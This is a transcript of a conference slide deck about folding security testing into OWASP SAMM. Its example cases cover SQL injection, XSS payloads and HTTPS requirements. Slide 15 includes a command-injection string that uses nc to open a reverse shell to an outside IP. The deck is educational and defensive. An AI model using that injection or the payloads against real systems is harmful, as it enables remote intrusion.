This document discusses using the OWASP SAMM (Software Assurance Maturity Model) framework for security testing. It provides examples of security testing cases, including SQL injection, command injection, cross-site scripting, and HTTPS protocol testing. The document argues that security testing should be integrated into overall testing practices rather than treated separately. It recommends SAMM as a step towards more mature testing methods and concludes that security is not achieved through isolated measures, but rather through comprehensive testing approaches.

1. Testing cases in
OWASP SAMM
OLEKSII BARANOVSKYI

2. My vision
 Security isn’t a miracle
 There is no lack in “security testing” there is a lack of “testing security”
 Traditional testing is more more formalized, manageable and difficult.
WHY?

4. OWASP SAMM
The Open Web Application Security Project Software
Assurance Maturity Model

5. Postures
 Evaluating an organization’s existing software
security practices.
 Building a balanced software security assurance
program in well-defined iterations.
 Demonstrating concrete improvements to a security
assurance program.
 Defining and measuring security-related activities
throughout an organization.

6. Why we need to use it?
Users:
Software development company
Enterprise

7. SAMM

8. Security testing place

9. Case 1. It’s not about security

10. SAMM

11. Case 2. SQLinj Example
http://site.com/test/test.php?id=434

12. Case 2. SQLinj Example
http://site.com/test/test.php?id=434’

13. SAMM

14. Case 3. SetUID Example
import os
cmd = './date.sh ' + param1
os.system(cmd)

15. Case 3. SetUID Example
import os
cmd = './date.sh ' + ’0.0.0; nc –e /bin/bash 5.10.114.4 8080'
os.system(cmd)
* Thanks to Yurii Bilyk

16. SAMM

17. Case 4. XSS Example
<script>alert(‘ok’);</script>
"'}})}}})});alert(ok'); window.addEventListener('load', function() { new
Vue({ methods:{ filter:function(){$.ajax({data:{a:'"

18. SAMM and where should we start?

19. Security requirements by SAMM

20. Case 5. HTTPS example
Requirement: Server and client should communicate via HTTP protocol.
Requirement: Server and client should communicate via HTTPS protocol.
Requirement: Server and client should communicate via HTTP with way that excludes the
disclosure of critical information.

21. SAMM and where should we start?

22. Conclusions
 Security really is not a miracle
 Security testing is a part of global testing coverage
 SAMM is a step from dedicated security testing to TMM
and EAAF

23. Thanks a lot!
Any additional questions?

24. Stay secure and mature!
HTTPS://WWW.FACEBOOK.COM/OLEKSII.BARANOVSKYI
HTTPS://WWW.LINKEDIN.COM/IN/OLEKSIIBARANOVSKYI/